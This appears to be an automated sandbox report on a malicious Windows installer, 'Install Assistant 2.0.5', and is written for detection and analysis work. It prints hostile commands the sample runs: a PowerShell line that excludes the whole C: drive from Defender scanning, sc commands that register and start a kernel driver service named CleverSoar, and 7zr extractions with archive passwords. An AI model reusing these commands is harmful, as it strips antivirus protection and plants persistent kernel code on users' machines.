Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp; Code function: 11_2_6C90B430 FindFirstFileA,FindClose, 11_2_6C90B430
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_00A76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 17_2_00A76868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_00A77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 17_2_00A77496
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: time.windows.com
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.dr; strings found in binary or memory (CA-issuer, CRL and OCSP URLs of the kind carried by an embedded DigiCert certificate chain; the characters after each URL are adjacent DER bytes, kept as extracted):
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe; string found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.0000000003590000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000000.1280165742.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000000.1383564167.0000000000C8D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.dr; strings found in binary or memory:
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process information set: 01 00 00 00

System Summary

Source: update.vac.6.dr | Static PE information: section name: .#.q
Source: update.vac.11.dr | Static PE information: section name: .#.q
Source: hrsw.vbc.11.dr | Static PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C915690 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C793886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C793C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C793D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C793D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C7939CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C793A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C9162D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C791950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C794754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00A728E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00A71E40 appears 150 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00B0FB10 appears 723 times
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: String function: 6C949240 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: String function: 6C9E6F10 appears 652 times
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.00000000036AE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000000.1276013755.0000000000DE9000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007FB6A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Binary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal92.evad.winEXE@129/33@1/0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C9162D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A79313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A83D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 17_2_00A79252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Code function: 11_2_6C9157B0 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\is-NDNFB.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1252:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2044:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1912:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4008:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3232:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | File created: C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe Process created: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe Process created: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
